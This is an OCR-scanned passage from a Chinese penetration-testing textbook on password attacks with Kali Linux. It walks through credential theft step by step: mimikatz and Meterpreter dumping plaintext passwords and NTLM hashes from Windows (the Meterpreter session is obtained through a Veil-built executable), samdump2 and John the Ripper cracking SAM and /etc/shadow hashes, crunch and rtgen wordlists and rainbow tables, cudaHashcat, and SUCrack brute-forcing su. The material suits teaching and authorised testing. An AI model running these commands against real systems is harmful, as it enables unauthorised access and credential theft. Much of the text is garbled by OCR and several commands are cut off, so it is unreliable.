在 该 界面 选择 “布局 ”标签 ， 修 改 屏幕 缓冲 区 大 小 下 面 的 高 度 值 。 然 后 单 击 “ 人 确定 ” 按 
钮 ， 即 可 滚动 鼠标 查看 所 有 内 容 。 


(3) 从 图 8.13 中 可 以 看 到 ，Windows7 系 统 处 于 锁定 状态 。 此 时 通过 在 命令 行 执 行 
一 些 命 全 恢复 Windows 用 户 密码 。 首 先 人 确认 当前 用 户 的 权限 ， 执 行 命 合 如 下 所 示 : 


C:\Windows\system32> whoami 
nt authority\system 


(4) #AZIUSBRMEH, FA AMEAAHAR. AVIFNUSBMEABSF:, th 
作 如 下 所 示 : 


C:\Windows\system32> F: 

F:\>dir mimikatz 

2014/05/26 03:45 4,311 README.md 
2014/06/15 04:54 Win32 
2014/06/15 04:54 x64 


从 输出 的 信息 中 ， Pg e tm ut Ape 个 文件 。 其 中 Win32 和 x64 表 示 
mimikatz 的 两 个 版 本 。 根 据 自 己 的 系统 架 择 相 应 的 版 本 ， 本 例 中 的 操作 系统 是 
32 位 ， 所 以 选择 使 用 Win32。 


(5) 查看 Win32 目 录 中 的 内 容 : 


F:\>cd mimikatz 

F:\Mimikatz>cd win32 
F:\Mimikatz\Win32>dir 

2014/06/15 04:54 29,056 mimidrv.sys 
2014/06/15 04:54 189,936 mimikatz.exe 
2014/06/15 04:54 27,632 mimilib.dll 


从 输出 的 信息 中 ， 可 以 看 到 Win32 目 录 中 有 三 个 文件 。 其 中 ，mimikatz 是 一 个 可 执 
行文 件 。 
(6) 运行 mimikatz 程 序 。 执 行 命令 如 下 所 示 : 


FAMimikatzWin32»mimikatz 
HHHH. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jun 14 2014 22:54:04) 


HE HR 
Ht | \ THE je 
Hf Benjamin DELPY ‘gentilkiwi ( benjamin@gentilkiwi.com ) 
fae Vv Fe itt p://blog.gentilkiwi.com/mimikatz (06.60) 
Ha with 14 modules * s »/ 
mimikatz # 


输出 信息 显示 了 mimikatz 的 一 些 相 关 信 息 ， 其 中 mimikatz # 提 示 符 表示 成 功 登 录 到 
了 mimikatz 程 序 。 


(7) 恢复 密码 。 执 行 命 分 如 下 所 示 : 


mimikatz # sekurlsa::logonPasswords 


x 
ay " 
-— " 


mimikatz # sekurlsa::logonPasswords full 


将 输出 如 下 所 示 的 信息 : 


Authentication Id : 0; 10201252 (00000000: 009ba8a4 ) 


Session : Interactive from 1 
User Name : lyw 
Domain : Windows7Test 
SID : S-1-5-21-2306344666-604645106-2825843324-10( 
msv : 
[00010000] CredentialKeys 
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4 
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f 


[00000003] Primary 
* Username : lyw 


* Domain : Windows7Test 
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4 
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f 
tspkg 
wdigest 
* Username : lyw 
* Domain : Windows7Test 
* Password : 123456 
kerberos 
* Username : lyw 
* Domain : Windows7Test 
* Password : (null) 
ssp 
credman 


a] a | 


从 以 上 输出 信息 中 ， 可 以 看 到 锁定 用 户 的 所 有 信息 。 如 用 户 名 、 各 种 加 密 的 HASH 
值 、 域 名 和 密码 等 。 


8.5 破解 纯 文 本 密码 工具 mimikatz 


mimikatz 是 一 球 强 大 的 系统 密码 破解 获取 工具 。 该 工具 有 上 段 时 间 是 作为 一 个 独立 程 
序 运行 。 现在 已 被 深 加 到 Metasploit 框 染 eR 中 ， 并 作为 一 个 可 加 载 的 Meterpreter 模 
块 。 oe 关 取 到 一 个 远程 会 话 时 ， 使 用 mimikatz 工 具 可 以 很 快 的 恢复 密码 。 本 
节 将 介绍 a 使 用 mimikatz 工 具 恢复 密码 


【实例 8-3】 演示 使 用 mimikatz 恢 复 纯 文本 密码 。 具 体操 作 步 又 如 下 所 示 。 


(1) 通过 在 目标 主机 (Windows 7) 上 运行 Veil 创 建 的 可 执行 文件 backup.exe， 获 
取 一 个 远程 会 话 。 如 下 所 示 : 


msf exploit(handler) > exploit 

[*] Started reverse handler on 192.168.6.103:4444 

[*] Starting the payload handler... 

[*] Sending stage (769536 bytes) to 192.168.6.110 

[^] Meterpreter session 2 opened (192.168.6.103:4444 -> 192.168.6.: 
meterpreter » 


[So 





从 输出 的 信息 中 ， 可 以 看 到 获取 到 了 一 个 与 192.168.6.110 主 机 的 远程 会 话 。 
(2) 确认 目标 用 户 的 权限 。 执 行 命令 如 下 所 示 : 


meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM 


从 输出 信息 中 ， 可 以 看 到 当前 用 户 已 经 是 系统 权限 。 此 时 ， 融 可 以 进行 其 他 操作 
Lo 


(3) 加 载 mimikatz 模 块 。 执 行 命 分 如 下 所 示 : 


meterpreter > load mimikatz 
Loading extension mimikatz..success. 


从 输出 的 信息 中 ， 可 以 看 到 mimikatz 模 块 已 加 载 成 功 。 
(4) 查看 mimikatz 模 块 下 有 效 的 命 分。 执行 命 分 如 下 所 示 : 


meterpreter > help 


执行 以 上 命令 后 ， 会 输出 大 量 的 信息 。 其 中 ， 在 Meterpreter 中 所 有 的 命令 都 已 分 
类 。 这 里 主要 介绍 下 mimikatz 相 关 的 命 售 ， 如 下 所 示 : 


Mimikatz Commands 


kerberos Attempt to retrieve kerberos creds 


livessp Attempt to retrieve livessp creds 
mimikatz command Run a custom commannd 

msv Attempt to retrieve msv creds (hashes) 
ssp Attempt to retrieve ssp creds 

tspkg Attempt to retrieve tspkg creds 
wdigest Attempt to retrieve wdigest creds 


以 上 输出 信息 显示 了 可 执行 的 Mimikatz 命 分 。 如 回复 kerberos 信 息 、livessp 信 息 和 
哈 希 信息 息 等 。 


[实例 8-4】 恢复 哈 希 密码 。 执 行 命令 如 下 所 示 : 


meterpreter > msv 

[*] Running as SYSTEM 

[*] Retrieving msv credentials 
msv credentials 


AuthlD pamane Domain User Password 
0; 287555 NTLM WIN-RKPKOFBLG6C bob 

Imi cdáfácdica451e41aad3b435b51404ee }, ntlm{ 3ed1ce151e74d17cee66bf 
6c3eed4625 } 
0:287509 NTLM WIN-RKPKOFBLG6C bob 

Im( cdáfácdicad51e41aad3b435b51404ee ), ntlm{ 3ed1ce151e74d1/cee66b 
fóc3eed4625 ] 
0:996 Negotiate WORKGROUP -RKPKOFBLG6C$ n.s. (Credentials KO) 
0:997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 
045372 NTLM n.s. (Credentials KO) 
0:999 NTLM WORKGROUP WIN-RKPKOFBLG6C$ n.s. (Credentials KO) 


执行 以 上 命令 后 ， 输 出 五 列 信息 。 分 别 表 示 认 证 ID、 包 、 域 名 、 用 户 名 和 密码 。 从 
该 界面 可 以 看 到 ， 当 前 系统 中 bob 用 户 的 哈 希 密码 值 中 。 在 哈 希 密码 值 中 ， 前 面 的 
Im 表示 使 用 LM 方 式 加 密 ; ntlm 表 示 使 用 NTLM 方 式 加 密 。 


【实例 8-5】 获取 kerberos (网 络 认 证 协议 ) 信息 。 执 行 命 令 如 下 所 示 : 


meterpreter > kerberos 

[+] Running as SYSTEM 

[*] Retrieving kerberos credentials 
kerberos credentials 


AuthlD Package Domain User ems 
0;999 NTLM WORKGROUP WIN-RKPKOFBLGSCS 

0;45372 NTLM 

0;997 Negotiate NT AUTHORITY LOCAL SERVICE 

0;996 Negotiate WORKGROUP WIN-RKPKQFBLG6C$ 

0:287509 NTLM WIN-RKPKQFBLG6C bob www.123 
0;:287555 NTLM WIN-RKPKOFBLG6C bob www.123 


从 输出 的 信息 中 可 以 看 到 ， 输出 的 信息 类 似 msv 命 倒 输出 的 信息 。 唯一 AR [8] A 
是 ， 这 里 可 以 看 至 使 用 哈 第 加 密 的 原 妈 密码 。 从 以 上 信息 中 ， 可 以 看 到 bob 用 户 的 
密码 为 WWW.123。 


【实例 8-6】 获取 wdigest HBAS eit) 信息 ， 如 下 所 示 : 


meterpreter > wdigest 

[+] Running as SYSTEM 

[+] Retrieving wdigest credentials 
wdigest credentials 


AuthlD Package Domain User Password 
0;999 NTLM WORKGROUP WIN-RKPKOFBLG6CS 
0:45372 NTLM 

0:997 Negotiate NT AUTHORITY LOCAL SERVICE 

0:996 Negotiate WORKGROUP WIN-RKPKOQFBLG6CS 
0:287509 NTLM WIN-RKPKOFBLGSC bob www.123 
0;:28/555 NTLM WIN-RKPKQFBLG6C bob www. 123 


以 上 输出 的 信息 就 是 当前 用 户 摘 要 式 身 份 验 证 的 信息 。 
【实例 8-7】 恢复 livessp 身 份 验证 信息 。 执 行 命令 如 下 所 示 : 


meterpreter > livessp 

[+] Running as SYSTEM 

[+] Retrieving livessp credentials 
livessp credentials 


AuthlD Package Domain User Password 

0:287555 NTLM WIN-RKPKQFBLG6C bob n.a. (livessp KO) 
0;:2875098 NTLM WIN-RKPKOFBLGOC bob n.a. (livessp KO) 
0:997 Negotiate NT AUTHORITY LOCAL SERVICE n.a. (livessp KO) 
0:996 Negotiate WORKGROUP WIN-RKPKOFBLGGCS n.a. (livessp KO) 
045372 NTLM n.a. (livessp KO) 
0;999 NTLM WORKGROUP WIN-RKPKQFBLG6C$ n.a. (livessp KO) 


meterpreter > 


以 上 输出 的 信息 显示 了 当前 用 户 livessp 喘 份 验证 信息 。 


8.6 破解 操作 系统 用 户 密码 


当 志 记 操 作 系 统 的 密码 或 者 攻击 某 癌 主机 时 ， 需 要 知道 该 系统 中 某 个 用 户 的 用 户 名 
和 密码 。 本 节 将 分 别 介绍 破解 Windows 和 Linux 用 户 密 码 。 


8.6.1 破解 Windows 用 户 密码 


Windows 系 统 的 用 户 名 和 密码 保存 在 SAM (安全 账号 管理 器 ) 文件 中 。 在 基于 NT 
内 核 的 Windows 系 统 中 ， 包 括 Windows 2000 及 后 续 版 本 ， 这 个 文件 保存 

在 “C:\Windows\System32\Config”" 目 录 下 。 出 于 安全 原因 ， 微 软 特定 添加 了 一 些 额 
外 的 安全 措施 将 该 文件 保护 了 起 来 。 首 先 ， 操 作 系 统 馈 动 之 后 ，SAM 文 件 将 同时 被 
锁定 。 这 意味 着 操作 系统 运行 之 时 ， 用 户 无 法 打开 或 复制 SAM 文 件 。 除 了 锁定 ， 整 
个 SAM 文 件 还 经 过 加 密 ， 且 不 可 见 。 


符 运 的 是 ， 现 在 有 办 法 绕 过 这 些 限 制 。 在 远程 计算 机 上 ， 只 要 目标 处 于 运行 状态 ， 
mi PJ LAF FaMeterpreter#SAM Juicer 获 取 计 算 机 上 的 艇 列 文件 。 获 得 访问 系统 的 物 
理 权 限 之 后 ， 用 户 就 可 以 在 其 上 启动 其 他 的 操作 系统 ， 如 在 USB 或 DVD-ROM 设 备 
上 的 Kali Linux, 启动 目标 计算 机 进入 到 其 他 的 操作 系统 之 后 ， 用 户 可 以 使 用 Kali 中 
的 John the Ripper 工 具 来 破解 该 Windows 用 户 密码 。 


使 用 John the Ripper 工 具 破 解 Windows 用 户 密 码 。 具 体操 作 步 又 如 下 所 示 。 
(1) 检查 当前 系统 中 的 硬盘 驱动 。 执 行 命 仿 如 下 所 示 : 


root@kali:~# fdisk -| 
Disk /dev/sda: 42.9 GB, 42949672960 bytes 
255 heads, 63 sectors/track, 5221 cylinders, total 83886080 sectors 
Units = sectors of 1 + 512 = 512 bytes 
Sector size (logical/physical): 512 bytes / 512 bytes 
l/O size (minimum/optimal): 512 bytes / 512 bytes 
Disk identifier: Oxcic6cfc6 
Device Boot Start End Blocks Id System 
/dev/sdal  * 63 83859299 41929618+ 7 HPFS/NTFS/exFAT 


输出 的 信息 表示 当前 系统 中 有 一 块 傍 瘟 ， 并 只 有 一 个 分 区 。 该 文件 系统 类 型 是 
NTFS， 也 是 Windows 系 统 的 所 存放 的 磁盘 。 


(2) EREE. ATA TA PHI: 


root@kali:~# mkdir /sdai # 创 建 挂 载 点 
root@kali:~# mount /dev/sdal /sdal/ # 挂 载 /dev/sdali 分 区 


执行 以 上 命令 后 ， 没 有 任何 输出 信息 。 
(3) 切换 目录 ， 进 入 到 Windows SAM 文 件 的 位 置 。 执 行 命 分 如 下 所 示 : 


root@kali:~# cd /sda1/WINDOWS/system32/config/ 


在 该 目录 中 ， 可 以 看 到 SAM 文 件 。 
(4) 使 用 SamDump2 提 取 SAM 文 件 。 执 行 命 令 如 下 所 示 : 


root@kali:/sdai/WINDOWS/system32/config# samdump2 SAM system > /ro 
Samdump2 1.1.1 by Objectif Securite 
http://www.objectif-securite.ch 

original author: ncuomoQstudenti.unina.it 

Root Key : SAM 


Ma tS BPA LASHER SAMI. REG XEBJPS ER El T /root/hash.txt 
文件 中 。 


(5) 运行 john 命 分 ， 实 现 密码 攻击 。 执 行 命 分 如 下 所 示 : 





root@kali:/sdai/WINDOWS/system32/config# /usr/sbin/john /root/hash 

Created directory: /root/.john 

Loaded 6 password hashes with no different salts (NT MD4 [128/128 < 
(Guest) 

guesses: 4 time: 0:00:03:13 0.09% (3) (ETA: Mon May 12 06:46:42 20: 

guesses: 4 time: 0:00:04:26 0.13% (3) (ETA: Mon May 12 04:02:53 20: 

guesses: 4 time: 0:00:04:27 0.13% (3) (ETA: Mon May 12 04:15:42 20: 
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8.6.2 破解 Linux 用 户 密码 


破解 Linux 的 密码 基本 上 和 破解 Windows 密 码 的 方法 非常 类 似 ， 在 该 过 程 中 只 有 一 
所 不 同 。Linux 系 统 没有 使 用 SAM 文 件 夹 来 保存 密码 散 列 。Linux 系 统 料 加 密 的 密码 
散 列 包含 在 一 个 叫做 shadow 的 文件 里 ， 该 文件 的 绝对 路 径 为 /etc/shadow。 


不 过 ， 在 使 用 John the Ripper 破 解 /etc/shadow 文 件 之 前 ， 还 需要 /etc/passwd 文 

件 。 这 和 提取 Windows 密 码 散 列 需 要 system 文 件 和 SAM 文 件 是 一 样 的 道理 。John 
the Ripper 自 带 了 一 个 功能 ， 它 可 以 料 shadow 和 passwd 文 件 结合 在 一 起 ， 这 样 就 
i 工具 破解 Linux 和 系统 的 用 户 密码 。 本 小 节 将 介绍 破解 Linux 用 户 密码 的 方 


使 用 John the Ripper 工 具 破 解 Linux 用 户 密码 。 具 体操 作 步 又 如 下 所 示 。 
(1) 使 用 unshadow 提 取 密 码 散 列 。 执 行 命 爷 如 下 所 示 : 


root@kali:~# unshadow /etc/passwd /etc/shadow > /tmp/linux_hashes. 1 
JES AAAIIIIIIAMNUZZUOS] 


执行 以 上 命令 后 ， 会 将 /etc/passwd/ 文 件 与 /etc/shadow/ 文 件 结合 在 一 起 ， 生 成 一 个 
叫做 linux_hashes.txt 的 文件 ， 保 存在 /tmp/ 目 录 中 。 


(2) 破解 Linux 用 户 密码 。 执 行 命 侈 如 下 所 示 : 





root@kali:~# john --format=crypt --show /tmp/linux_hashes.txt 
root :123456:0:0:root:/root:/bin/bash 

bob:123456:1000:1001: :/home/bob:/bin/sh 
alice:123456:1001:1002::/home/alice:/bin/sh 

3 password hashes cracked, © left 


从 输出 的 结果 中 ， 可 以 看 到 当前 系统 中 共有 三 个 用 户 ， 其 密码 都 为 123456。 





—— 注意 : 使 用 John the Ripper 开 始 破解 Linux 密 码 之 前 ， 需 要 使 用 支持 破解 不 
同类 型 密码 散 列 的 John the Ripper 版 本 。 如 果 用 错 版 本 或 者 使 用 未 打 补 丁 的 John 
the Ripper， 程 序 将 返回 错误 信息 No password hashes loaded (没有 价值 密码 更 
列 ) 。 大 多 数 现代 Linux 系 统 都 使 用 SHA 艇 列 加 密 算 法 保存 密码 。 


8.7 创建 密码 字典 


所 谓 的 密码 字典 主要 是 配合 密码 破解 软件 所 使 用 ， 密 码 字 典 里 包括 许多 人 们 习惯 性 
设置 的 密码 。 这 样 可 以 提高 密码 人 破解 软件 的 密码 破解 成 功率 和 命中 率 ， 缩 短 密码 破 
解 的 时 间 。 当 然 ， 如 果 一 个 人 密码 设置 没有 规律 或 很 复杂 ， 未 包含 在 冤 码 字典 里 ， 
这 个 字典 束 没 有 用 了 ， 甚 至 会 延长 密码 破解 所 需要 的 时 间 。 在 Linux 中 有 Crunch 和 
Mg eer PENIS a ewe 
J 使 用 方法 。 


8.7.1 Crunch 工 具 


Crunch 是 一 种 创建 密码 字典 工具 ， 该 字典 通 单 用 于 暴力 破解。 使 用 Crunch 工 具 生 
成 的 密码 可 以 发 送 到 终端 、 文 件 或 另 一 个 程序 。 下 面 将 介绍 使 用 Crunch 工 具 创 建 密 
码 字 典 。 


使 用 Crunch 生 成 字典 。 上 有 具体 操作 步骤 如 下 所 示 。 


(1) 和 启动 crunch 命 令 。 执 行 命 令 如 下 所 示 。 


root@kali:~# crunch 


HiT AL aaa, PO PAPAS : 


crunch version 3.4 

Crunch can create a wordlist based on criteria you specify. The out 
Usage: crunch <min> <max> [options] 

where min and max are numbers 

Please refer to the man page for instructions and examples on how 1 
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俞 出 的 信息 显示 了 crunch 命 令 的 版 本 及 语法 格式 。 其 中 ， 使 用 crunch 命 仿生 成 密码 
的 语法 格式 如 下 所 示 : 





crunch [minimum length] [maximum length] [character set] [options] 
LEN L 
crunch 命 令 常 用 的 选项 如 下 所 示 。 
© -0 : 用 于 指定 输出 字典 文件 的 位 置 。 
e -b: 指定 写 和 文件 最 大 的 字 节 数 。 该 大 小 可 以 指定 KB、MB 或 GB， 但 是 必须 
与 -o START 选 项 一 起 使 用 。 


e -t: 设置 使 用 的 特殊 格式 。 
e -| : 该 选项 用 于 当 -t 选 项 指定 @、% 或 ^ 时 ， 用 来 识别 占 位 符 的 一 些 字符 。 


(2) 创建 一 个 密码 列表 文件 ， 并 保存 在 桌面 上 。 其 中， 生成 密码 列表 的 最 小 长 度 
为 8， 最 大 长 度 为 10， 并 使 用 ABCDEFGabcdefg0123456789 为 字符 集 。 执 行 命 兮 
如 下 所 示 : 


root@kali:~# crunch 8 10 ABCDEFGabcdefg0123456789 -0 /root/Desktop, 
generatedCrunch.txt 

Notice: Detected unicode characters. If you are piping crunch outpi 
to another program such as john or aircrack please make sure that | 
can handle unicode input. 

Do you want to continue? [Y/n] y 

Crunch will now generate the following amount of data: 724845943848 
691266960 MB 

675065 GB 

659 TB 

© PB 

Crunch will now generate the following number of lines: 6615526381: 
AAAAAAAA 

AAAAAAAB 

AAAAAAAC 

AAAAAAAD 

AAAAAAAE 

AAAAAAAF 


AAdb6gFe 
AAdb6gFf 
AAdb6gFg 
AAdb6gF0 
AAdb6gF1 
AAdb6gF2 
AAdb6gF3 
AAdb6gF4 
AAdb6gF5 


ai 一 一 一 


从 以 上 输出 的 信息 中 ， 可 以 看 到 将 生成 659TB 大 的 文件 ， 总 共有 66155263819776 
行 。 以 上 命令 执行 完成 后 ， 将 在 果 面 上 生成 一 个 名 为 generatedCrunch.txt 的 字典 文 
件 。 由 于 组 合生 成 的 密码 较 多 ， 所 以 需要 很 长 的 时 间 。 


(3) 以 上 密码 字典 文件 生成 后 ， 使 用 Nano 命 合 打 开 。 执 行 命 合 如 下 所 示 : 





root@kali:~# nano /root/Desktop/generatedCrunch.txt 


执行 以 上 命令 后 ， 将 会 打开 generatedCrunch.txt 文 件 。 该 文件 中 保存 了 使 用 crunch 
命令 生成 的 所 有 密码 。 


8.7.2 rtgen 工 具 


rtgen 工 具 用 来 生成 彩虹 表 。 ee Ae 6 的 字母 组 合 预先 计 
算 好 的 哈 希 值 的 集合 。 彩 虹 表 不 一 定 是 针对 MD5 算 法 的 ， 各 种 算法 都 有 ， 有 了 它 可 
以 快速 的 破解 各 类 密码 。 起 是 复杂 的 密码 需要 的 彩虹 表 就 越 大 ， 现 在 主流 的 彩虹 
表 都 是 100G 以 上 。 


使 用 rtgen 工 具 生 成 彩虹 表 。 具体 操作 步骤 如 下 所 示 : 
(1) 切换 到 rtgen 目 录 。 wii RAAT. 


root@kali:~# cd /usr/share/rainbowcrack/ 


(2) 使 用 rtgen 命 仿生 成 一 个 基于 MD5 的 彩虹 表 。 执行 命令 如 下 所 示 : 


root@kali:/usr/share/rainbowcrack# ./rtgen md5 loweralpha-numeric : 
rainbow table md5_loweralpha-numeric#1-5_0_3800x33554432_0.rt parar 
hash algorithm: md5 

hash length: 16 

charset: abcdefghijklmnopqrstuvwxyz0123456789 

charset in hex: 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 
charset length: 36 

plaintext length range: 1 - 5 

reduce offset: 0x00000000 

plaintext total: 62193780 

sequential starting point begin from © (0x0000000000000000) 
generating.. 

131072 of 33554432 rainbow chains generated (0 
262144 of 33554432 rainbow chains generated (0 
393216 of 33554432 rainbow chains generated (0 
524288 of 33554432 rainbow chains generated (0 
655360 of 33554432 rainbow chains generated (0 
/86432 of 33554432 rainbow chains generated (0 S) 
917504 of 33554432 rainbow chains generated (0 S) 
1048576 of 33554432 rainbow chains generated (0 m 38. 8 s) 
1179648 of 33554432 rainbow chains generated (0 m 39.2 s) 
1310720 of 33554432 rainbow chains generated (0 m 38.2 s) 


42. 
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33161216 of 33554432 rainbow chains generated (0 m 40.2 s) 
33292288 of 33554432 rainbow chains generated (0 m 38.9 s) 
33423360 of 33554432 rainbow chains generated (0 m 38.1 s) 
33554432 of 33554432 rainbow chains generated (0 m 39.1 s) 


[J| tecum E T——| 


以 上 信息 显示 了 彩虹 表 的 参数 及 生成 过 程 。 例 如 ， 生 成 的 彩虹 表 文 件 名 为 
md5 loweralpha-numeric#1-5 0 3800x33554432 O.rt ; 该 表 使 用 MD5 散 列 算法 加 
密 的 ; 使 用 的 字符 集 abcdefghijklImnopqrstuvwxyz0123456789 等 。 





(3) 为 了 容易 使 用 生成 的 彩虹 表 ， 使 用 rtsort 命 令 对 该 表 进 行 排序 。 执 行 命 令 如 下 
所 未 : 


root@kali:/usr/share/rainbowcrack# rtsort md5_loweralpha-numeric#1- 
3800x33554432 O.rt 

md5 loweralpha-numericzi1-5 0 3800x33554432 0.rt: 

1351471104 bytes memory available 

loading rainbow table.. 

sorting rainbow table by end point.. 

writing sorted rainbow table.. 


a] EE | ee 


输出 以 上 信息 表示 生成 的 彩虹 表 已 成 功 进行 排序 。 





8.8 使 用 NVIDIA 计 算 机 统一 设备 架构 (CUDA) 


CUDA (Compute Unified Device Architecture) 是 一 种 由 NVIDIA 推 出 的 通用 并 行 
计算 架构 ， 该 架构 使 用 GPU 能 够 解决 复杂 的 计算 问题 。 它 包含 了 CUDA 指 合集 架构 
(ISA) 及 GPU 内 部 的 并 行 计算 引 擎 。 用 户 可 以 使 用 NVIDIA CUDAN $ FARAR 
法 加 密 的 密码 ， 这 样 可 以 提高 处 理 的 速度 。 本 节 将 介绍 使 用 OclHashcat 工 具 攻 击 窗 
码 。 

使 用 OclHashcat 工 具 之 前 ， 一 定 要 确定 当前 系统 已 正确 安 沪 了 NVIDIA 显 卡 驱 动 。 


在 Kali 中 ，OclHashcat 默 认 安 装 在 /usr/share/oclhashcat 目 录 中 。 所 以 需要 先 切 换 目 
录 到 OclHashcat， 和 再 启动 OclHashcat 工 具 。 执 行 命 分 如 下 所 示 : 


rootd@kali:~# cd /usr/share/oclhashcat 
rooti@Kali:/usr/share/oclhashcat # ls 


charsets cudaExample500.sh eula.accepted example500.hash hashcat.hcstat masks 
oclExample500.sh 
cudaExample0.sh cudaHashcat.bin example0.hash example.dict 
hashcat.pot oclExampleO.sh oclHashcat.bin 
cudaExample400.sh docs example400.hash extra kernels — oclExample400.sh 
rules 


以 上 输出 结果 显示 了 OclHashcat 目 录 下 所 有 的 文件 。 其 中 ，cudaHashcat.bin 可 执 
行文 件 是 用 于 破解 密码 文件 的 。 在 使 用 该 可 执行 文件 之 前 ， 先 查看 下 它 的 帮助 文 
档 。 执 行 命 人 如 下 所 示 : 


roati&kali-/usr/sharel'oclhashcatit JcudaHashcat.bin --help 
cudaHashcat, advanced password recovery 


Usage: cudaHashcat [options]... 
zu 


a General: 
-m, --hash-type=NUM 
-a, --attack-mode-NUM 
-¥, -version 


hash|hashfile|hccapfile [dictionary| mask] 


Hash-type, see references below 
Attack-mode, see references below 
Print version 


-h, --help Print help 
--eula Print EULA 
--quiet Suppress output 
* Benchmark: 
-b, -benchmark Run benchmark 
-benchmark-mode-NUM Benchmark-mode, see references below 
* Misc: 
--hex-salt Assume salt is given in hex 
--hex-charsat Assume charset is given in hex 
--farce Ignore warnings 
--Status Enable automatic update of the status-screen 
--status-timer=NUM seconds between status-screen update 
iR 
References 
* Benchmark Settings: 


0 = Manual Tuning 
1 = Performance Tuning. default 
+ Outfile Formats: 
1 = hash[:salt] 
2 = plain 
3 = hash[:salt]:plain 
4 = hex plain 
5 zhash[salt:hex plain 
6 = plain:hex plain 
7 = hash[:salt]:plain:hex plain 
* Built-in charsets: 
中 = abcdefghijklmnopqrstuvwxyz 
?u = ABCDEFGHIJKLMNOPORSTUVWXYZ 
?d= 0123456789 
?a = ?l?u?d'?s 
?s 2. PESHA (J+ -iea "(- 
* Attack modes: 
0 = Straight 
1 = Combination 
3 = Brute-force 
6 = Hybrid dict + mask 
7 = Hybrid mask + dict 
=。 Specific hash types: 
11 = Joomla 
21 = osCommerce, xt:Commerce 
101 = nsldap, SHA-1(Base64), Netscape LDAP SHA 
111 = nsldaps, SSHA-1(Base64), Netscape LDAP SSHA 
112 = Oracle 11g 
121 = SMF > v1.1 
122 = OSA v10.4, v10.5, v10.6 
131  MSSQL(2000) 
132 = MSSQL(2005) 
141 = EPiServer 6.x < v4 
1441 = EPiServer 6.x > v4 
1711 = SSHA-512(Base64), LDAP {SSHA512} 
1722 = OSX v10.7 
1731 = MSSQL(2012) 
2611 = vBulletin < v3.8.5 
2711 = vBulletin > v3.8.5 
2811 = IPB2*, MyBB1.2+ 
62XY = TrueCrypt 5.0+ 
X =1=PBRKD F2-HMAC-RipeMD160 


X =2? = PBKDF?2-HMAC-SHA512 

X =3 = PBKDF2-HMAC-Whirlpool 

X -4- PBKDF2-HMAC-RipeMD160 boot-mode 
Y=1=ATSAES 
Y=2= ATS Serpent --- unfinished 
Y=3= ATS Twofish --- unfinished 
Y =A= YTS AFESG-Twnfich --- iinfiniched 


Y = 三 = XTS AES-Twofish-Serpent --- unfinished 
Y 262 XTS Serpent-AES --- unfinished 
Y= 7 = ATS Serpent-Twofish-AES — --- unfinished 
Y 282 ATS Twofish-Serpent --- unfinished 


俞 出 的 信息 显示 了 cudaHashcat.bin 命 令 的 语法 格式 、 可 用 选项 及 配置 例子 等 。 


了 解 cudaHashcat 命 他 的 语法 及 选项 后 ， 融 可 以 指定 要 破解 的 密码 文件 了 。 执 行 命 
SO RPA : 


root@kali:~# ./cudaHashcat.bin attackfile -1 ?1?u?d?s 21717171 ?1?: 
ee 
下 面 对 以 上 命令 中 的 各 参数 将 分 别 进行 介绍 ， 如 下 所 示 。 


e ./cudaHashcat.bin : 表示 调用 cudaHashcat 命 倒 

e attackfile : 指 的 是 攻击 的 文件 。 

e -1?l?u?d? : 表示 指定 的 一 个 自 定义 字符 集 。 该 选项 指定 的 字符 集 可 以 是 小 写 
字母 、 大 写字 母 和 数字 。 

e 21717171: 表示 使 用 字符 集 唯一 的 左 掩 码 。 

e 21717171: 表示 使 用 字符 集 唯一 的 右 掩 码 。 





8.9 物理 访问 攻击 


物理 访问 攻击 与 提升 用 户 的 权限 类 似 。 即 当 一 个 普通 用 户 登 录 到 系统 中 ， 破 解 本 地 
其 他 用 户 账户 的 密码 。 在 Linux 中 ， 普 通用 户 可 以 通过 su 命令 代 蔡 其 他 用 户 执 行 某 
些 操作 ， 意 味 着 该 用 户 能 够 在 Linux/Unix 系 统 中 提升 自己 的 权限 。 在 这 种 情况 下 ， 
可 以 使 用 SUCrack 工 具 暴 力 破 解 使 用 su 的 本 地 用 户 账户 的 密码 ， 来 完成 后 续 的 渗透 
攻击 操作 。 本 节 将 介绍 使 用 SUCrack 工 具 攻 击 该 用 户 。 


SUCrack 是 一 个 多 线程 工具 ， 人 允许 用 户 暴 力 攻 击 使 用 su 的 本 地 用 户 账户 的 密码 。 该 
工具 常用 的 几 个 选项 如 下 所 示 。 


--help : 查看 SUCrack 的 帮助 文件 。 

-| : 修改 党 斌 攻击 登录 的 用 户 。 

-S : 设置 显示 统计 的 间隔 时间。 默认 时 间 是 3 秒 。 

-a : 人 允许 用 户 设置 是 否 使 用 ANSI 转 义 码 。 

-w : 是 在 SUCrack 能 够 利用 的 线程 数 。 因 为 SUCrack 是 多 线程 的 ， 用 户 可 以 指 
定 希 望 运 行 的 线程 数 。 这 里 建议 仅 使 用 1 个 ， 因 为 当 每 个 尝试 登录 失败 时 ， 征 
迟 3 秒 后 将 重新 党 试 连接 。 


【实例 8-8】 使 用 SUCrack 破 解 本 地 用 户 的 密码 。 使 用 SUCrack 命 令 时 ， 需 要 指定 
一 个 密码 文件 。 否 则 ， 将 会 得 到 一 个 搞笑 的 提示 信息 。 执 行 命 合 如 下 所 示 : 


$ sucrack /usr/share/wordlists/wordlist.txt 
password is: 123456 


从 输出 的 信息 中 可 以 看 到 ， 本 地 用 户 root 的 密码 为 123456。 因 为 使 用 su 命令 ， 不 指 
定 用 户 时 ， 黑 认 使 用 的 是 根 root 用 户 。 所 以 ， 执 行 以 上 命令 后 ， 破 解 的 是 根 用 户 
root 的 密码 。 


如 果 用 户 想 设置 两 个 线程 ， 每 隅 6 秒 显 示 统 计 信 息 并 想 要 设置 使 用 ANSI 转 义 码 。 执 
行 命令 如 下 所 示 : 


$ sucrack -w 2 -s 6 -a /usr/share/wordlists/wordlist.txt 


AOS DRAMAER 


URS, LESBTAMBARAMSA. DREN REARRDA, 5282) S 7o 
线 信号 ， 以 便 随时 随地 处 理 手头 上 的 工作 。 但 是 在 很 多 情况 下 ， 这 些 无 线 信号 都 需 
